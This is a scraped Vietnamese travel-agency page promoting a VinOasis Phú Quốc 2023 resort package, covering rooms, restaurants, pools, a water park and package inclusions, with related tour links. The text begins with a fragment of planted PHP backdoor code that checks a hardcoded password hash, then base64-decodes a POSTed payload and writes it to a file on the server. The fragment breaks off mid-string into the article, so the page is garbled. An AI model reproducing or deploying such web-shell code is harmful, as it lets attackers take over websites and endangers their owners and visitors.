function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" [HOT] Combo VinOasis Phú Quốc 2023 trọn niềm vui - Đi Để Đến

[HOT] Combo VinOasis Phú Quốc 2023 trọn niềm vui

31/12/2022 Đi Để Đến - Group

Combo VinOasis Phú Quốc 2023 là combo du lịch được săn lùng bởi các tín đồ du lịch, cực kỳ thích mê các resort, khu giải trí của tập đoàn Vingroup. VinOasis Phú Quốc là khu tập hợp các khu nghỉ dưỡng, ăn uống, mua sắm và cũng là một khu giải trí khổng lồ tha hồ cho bạn thỏa thích nghỉ dưỡng và trải nghiệm. Hãy cùng dideden.com tìm hiểu thêm về VinOasis Phú Quốc 2023 cùng như là combo VinOasis Phú Quốc 2023 bạn nhé!

VINOASIS PHÚ QUỐC – THIÊN ĐƯỜNG NGHỈ DƯỠNG VỚI VÔ VÀN CÁC LOẠI HÌNH GIẢI TRÍ

VinOasis Phú Quốc không đơn thuần là nơi chỉ dành cho nghỉ dưỡng mà còn là tập hợp vui chơi và giải trí cũng như mua sắm thả ga. VinOasis gây choáng ngợp với khách vì lên đến 1379 phòng nghỉ dưỡng và các nhà hàng, hồ bơi, phòng hội họp hay nâng cao sức khỏe với phòng tập thể hình và spa. Cũng như điều mà chỉ khu nghỉ dưỡng tại VinOasis tại Phú Quốc mới có chính là công viên nước VinOasis chơi cực đã dành cho giới trẻ.

combo Vinoasis Phú Quốc 2023- VinOasis Resort Phú Quốc

Nhìn từ trên cao VinOasis Phú Quốc hiện ra trước mắt

Đến VinOasis bằng combo VinOasis Phú Quốc 2023 bạn sẽ không cần phải quá lo nghĩ về chi phí du lịch hay phương tiện di chuyển, với nhiều tiện ích đã trọn gói trong combo tuyệt vời là sự lựa chọn hợp lý trong suốt quá trình du lịch và nghỉ dưỡng tại Phú Quốc.

Địa chỉ: Bãi Dài, Gành Dầu, thành phố Phú Quốc

>> Xem thêm: Ăn mừng Tết 2023 này, đặt combo Phú Quốc Novotel ngay!

KHÁM PHÁ BÊN TRONG VINOASIS CÓ GÌ?

Phòng nghỉ dưỡng

Tại VinOasis chỉ chia thành 2 hạng phòng cơ bản là phòng Standard (diện tích khoảng 42m²) và phòng Junior Suite (diện tích rơi vào khoảng 84m²). Tại phòng Standard, bạn có thể tự do chọn giường King hoặc Twin tùy vào nhu cầu nghỉ dưỡng của bạn. Căn phòng với lối thiết kế đơn giản nhưng vẫn mang lại sự sang trọng với tone trắng đặc trưng, trang thiết bị đầy đủ mang đến sự tiện nghi nghỉ dưỡng. Nếu bạn chọn combo VinOasis Phú Quốc 2023 sẽ được nhận giá ưu đãi khi đặt phòng.

combo Vinoasis Phú Quốc 2023-phòng Standard tại VinOasis Phú Quốc

Phòng Standard tại VinOasis Phú Quốc với giá cực kỳ ưu đãi khi mua combo VinOasis Phú Quốc 2023

Về phòng Junior Suite, phòng có thiết kế sang trọng với tone vàng – trắng khác biệt hơn so với phòng Standard, cũng như diện tích phòng rộng rãi dành cho 3 đến 4 người lưu trú thoải mái. Bạn sẽ được nhận nước đóng chai tại phòng cũng như các tiện ích khác nếu mua combo VinOasis Phú Quốc 2023. Đây là sự lựa chọn cực kỳ hợp lý khi bạn ghé đến Phú Quốc mùa cao điểm.

combo Vinoasis Phú Quốc 2023-phòng Junior Suite

Phòng Junior Suite với lối thiết kế sang trọng và hiện đại

>> Xem thêm: Cùng combo Sài Gòn Phú Quốc vi vu đảo ngọc đón năm 2023

Các nhà hàng tại VinOasis

Nhà hàng Atlantis tại VinOasis chuyên phục vụ các món châu Âu, đặc biệt là ẩm thực Ý đặc trưng như pizza, pasta chế biến theo nhiều cách khác nhau,… Thiết kế tại nhà hàng gây ấn tượng với nhiều thực khách đăng ký combo VinOasis Phú Quốc 2023, thiết kế mang màu sắc thành phố biển vùng châu Âu, cũng như không gian thoáng đãng thoải mái cho khách dùng bữa.

combo Vinoasis Phú Quốc 2023-nhà hàng Atlantis

Nhà hàng Atlantis phục vụ ẩm thực Ý đa dạng và không gian ăn uống cực kỳ sang trọng

Nếu bạn mua combo VinOasis Phú Quốc 2023 bạn sẽ được một vé buffet miễn phí tại nhà hàng Nautilus phục vụ món ăn theo mô hình tự chọn. Nhiều món ăn đa dạng từ Á đến Âu mang đến nhiều sự lựa chọn cho khách hàng khi dùng bữa tại đây. Cũng như không gian ấm cúng, sạch sẽ là điểm cộng lớn của nhà hàng buffet Nautilus tại VinOasis.

combo Vinoasis Phú Quốc 2023- nhà hàng buffet Nautilus

Nhà hàng buffet Nautilus phục vụ các món ăn đa dạng từ Á đến Âu

Một không gian nhà hàng hoàn toàn khác biệt tại VinOasis Phú Quốc chính là nhà hàng Chinese mang phong cách ẩm thực đậm chất Trung Hoa. Khách hàng sẽ được thưởng thức các món ăn như bánh bao xá xíu, bánh bao kim sa, các loại dimsum hấp dẫn và đa dạng loại lẩu Trung Quốc. Đây là nhà hàng mà bạn nên ghé khi du lịch cùng combo VinOasis Phú Quốc 2023.

combo Vinoasis Phú Quốc 2023-nhà hàng Chinese

Nhà hàng Chinese có không gian đậm chất Trung Hoa

>> Xem thêm: Tổng kết năm với combo du lịch Phú Quốc 2022

Các dịch vụ khác

Hồ bơi, Phòng tập thể hình và phòng hội nghị

Đến với VinOasis bạn sẽ được thả mình trong không gian nghỉ dưỡng đầy đủ với các dịch vụ được miễn phí tại combo VinOasis Phú Quốc 2023 như hồ bơi, phòng tập thể hình và các phòng họp hội nghị. Hồ bơi tại VinOasis sẽ chia làm 2 khu: khu người lớn (mức độ nước sâu khoảng 1.27m) và khu trẻ em (mức độ nước sâu chỉ khoảng (0.5-1m). Tại hồ bơi bạn sẽ phóng tầm nhìn ra phía cảnh biển tuyệt đẹp, đặc biệt là vào thời khắc hoàng hôn.

combo Vinoasis Phú Quốc 2023- hồ bơi tại VinOasis Resort Phú Quốc

Hồ bơi ngoài trời được nhiều người yêu thích tại VinOasis Resort Phú Quốc

Phòng tập thể hình tại VinOasis được trang bị các thiết bị hiện đại, cũng như PT hỗ trợ tập thể dục cho khách chưa biết tập như thế nào. Ngoài ra, bạn sẽ còn được thưởng thức view phòng tập gần gũi với thiên nhiên cũng là điều mà VinOasis muốn mang lại cho khách hàng khi đến Phú Quốc tham quan. Chọn ngay combo VinOasis Phú Quốc 2023 để miễn phí dịch vụ tập thể hình bạn nhé!

combo Vinoasis Phú Quốc 2023-phòng tập thể hình

Phòng tập thể hình với nhiều dụng cụ và thiết bị hỗ trợ tập thể dục cho khách

VinOasis Phú Quốc là sự lựa chọn hợp lý cho các công ty bởi vì phòng hội nghị tại VinOasis có sức chứa cực kỳ lớn, phù hợp làm đêm gala meeting hay họp hội nghị. Với hệ thống phòng hội họp lên đến hơn 10 phòng, diện tích rộng lớn tạo điều kiện cho các dịch vụ tổ chức tiệc, tổ chức đám cưới,…

combo Vinoasis Phú Quốc 2023-phòng hội nghị tại VinOasis Phú Quốc

Phòng hội nghị cực kỳ sang trọng và hiện đại với nhiều thiết bị hỗ trợ

>> Xem thêm: [HOT] Combo Sol Beach Phú Quốc đón năm 2023

Công viên nước VinOasis

Công viên nước VinOasis là điểm nổi bật của khu nghỉ dưỡng VinOasis Phú Quốc. Khi đăng ký combo VinOasis Phú Quốc 2023, bạn sẽ được vé miễn phí tại công viên nước VinOasis. Được xây dựng trên một mảnh đất rộng lớn, công viên nước VinOasis là địa điểm cực hot cho tín đồ du lịch vừa thích nghỉ dưỡng vừa vui chơi thả ga.

combo Vinoasis Phú Quốc 2023-công viên nước VinOasis

Công viên nước VinOasis hấp dẫn du khách với nhiều trò chơi hấp dẫn và lôi cuốn

Đa dạng nhiều trò chơi tại VinOasis như cầu trượt nước lên đến 14 cầu trượt đa dạng màu sắc. Hoặc bạn có thể tha hồ chơi các trò chơi khác dưới nước cực kỳ hấp dẫn. Cũng như các trò chơi trên cạn như tàu trượt siêu tốc chẳng hạn. VinOasis Phú Quốc xứng danh là thiên đường nghỉ dưỡng và vui chơi dành cho mọi lứa tuổi.

COMBO VINOASIS PHÚ QUỐC 2023 HOT NHẤT MÙA DU LỊCH

Trọn gói vé máy bay gồm 15-20 kg hành lý ký gửi đi từ tỉnh thành khác đến Phú Quốc hai chiều

Lưu trú và trải nghiệm 2 đêm nghỉ tại VinOasis Phú Quốc Resort đạt chuẩn 5 sao quốc tế sang trọng

Nghỉ dưỡng tại phòng Standard có ban công phóng ra tầm nhìn biển với diện tích khoảng 42m² 

Các tiện ích và dịch vụ tại combo VinOasis Phú Quốc 2023:

Khách được thưởng thức buffet sáng trong 2 ngày nghỉ dưỡng tại resort

Khách sẽ được cung cấp xe đưa đón sân bay đi theo lịch trình do resort sắp xếp sẵn Phú Quốc – khách sạn và ngược lại

Khách cũng được cấp bảo hiểm du lịch rơi vào khoảng 20 triệu đồng 1 trường hợp

2 vé chơi thỏa thích không giới hạn thời gian tại công viên nước VinOasis cực kỳ nổi tiếng và nhiều trò chơi hấp dẫn

Các dịch vụ như hồ bơi ngoài trời (trẻ em và người lớn), phòng tập thể hình trang bị đầy đủ các thiết bị hiện đại hỗ trợ khách nâng cao thể chất trong quá trình nghỉ dưỡng khi mua combo VinOasis Phú Quốc 2023

Kết nối và truy cập Wifi/Internet với tốc độ cực kỳ cao trong phòng nghỉ dưỡng cũng như các khu vực khác trong khách sạn

Khi khách đến check-in tại phòng sẽ được tặng thức uống chào mừng

VinOasis sẽ cung cấp các thức uống cơ bản như trà, cà phê, cũng như các thức uống đóng chai được phục vụ hằng ngày tại phòng

Khách còn được cấp xe tham quan và khám phá chợ đêm Dương Đông theo lịch trình được định sẵn mà resort đặt ra.

>> Xem thêm: Mách nhỏ top combo Phú Quốc 4 ngày 3 đêm nghỉ dưỡng tại resort

Combo VinOasis Phú Quốc 2023dideden.com gợi ý có thể hỗ trợ bạn trong việc lựa chọn combo nghỉ dưỡng VinOasis Phú Quốc 2023 thích hợp dành cho bạn. Hãy gọi vào số hotline 1900 4698 để được hỗ trợ và tư vấn về combo VinOasis Phú Quốc 2023 bạn nhé. Cùng tìm hiểu thêm những thông tin hấp dẫn tại Vietnambooking bạn nhé!

ĐĂNG KÍ ĐẶT COMBO VINOASIS PHÚ QUỐC 2023
  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]